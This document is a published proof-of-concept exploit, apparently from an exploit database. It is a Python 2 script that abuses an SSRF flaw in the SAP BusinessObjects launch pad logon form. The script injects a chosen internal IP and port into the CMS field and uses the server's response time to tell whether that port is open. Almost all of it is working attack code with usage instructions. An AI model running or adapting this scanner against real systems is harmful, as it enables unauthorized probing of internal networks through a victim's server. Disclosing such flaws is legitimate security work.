# Exploit Title: SAP BusinessObjects launch pad SSRF # Date: 2017-11-8 # Exploit Author: Ahmad Mahfouz # Category: Webapps # Author Homepage: www.unixawy.com # Description: Design Error in SAP BusinessObjects launch pad leads to SSRF attack #!/usr/bin/env python # SAP BusinessObjects launch pad SSRF Timing Attack Port scan # usage : sblpta.py http://path.faces targetIP targetPort import urllib2 import urllib import ssl from datetime import datetime import sys if len(sys.argv) != 4:    print "Usage: python sblpta.py http://path.faces targetIP targetPort"    sys.exit(1) url = sys.argv[1] targetIP = sys.argv[2] targetPort = sys.argv[3] targetHostIP = "%s:%s" %(targetIP,targetPort) print "\r\n" print "[*] SAP BusinessObjects Timing Attack" headers = {'User-Agent': 'Mozilla/5.0'} gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1) try:    request = urllib2.Request(url, headers=headers)    page = urllib2.urlopen(request, context=gcontext)    print "[*] Connected to SAP Bussiness Object %s"  %url except:    print "[-] Failed To connect to SAP Bussiness Object %s" %url    print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"    sys.exit(2) resheaders = page.info() cookie = resheaders.dict['set-cookie'] content = page.readlines() for line in content:    if "com.sun.faces.VIEW" in line:       sfview = line.split("=")[4].split("\"")[1]       print "[*] Got java faces dynamic value"    else:       continue if not sfview:    print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"    sys.exit(3) formdata = {"_id0:logon:CMS":targetHostIP,          "_id0:logon:USERNAME":"",          "_id0:logon:PASSWORD":"",          "com.sun.faces.VIEW":sfview,          "_id0":"_id0"          } data_encode = urllib.urlencode(formdata) start =  datetime.now() print "[*] Testing Timing Attack %s" %start        request = urllib2.Request(url,data_encode) request.add_header('Cookie', cookie) response  = urllib2.urlopen(request) end = datetime.now() the_page = response.read() if "FWM" in the_page:    elapsedTime = end-start    if elapsedTime.total_seconds() >= 10:       print "[*] Port %s is Open, Gotcha !!! " %targetPort    else:       print "[*] Port %s is Closed , we die fast"  %targetPort elif "FWC" in the_page:    print "[-] error login expired"    sys.exit(10)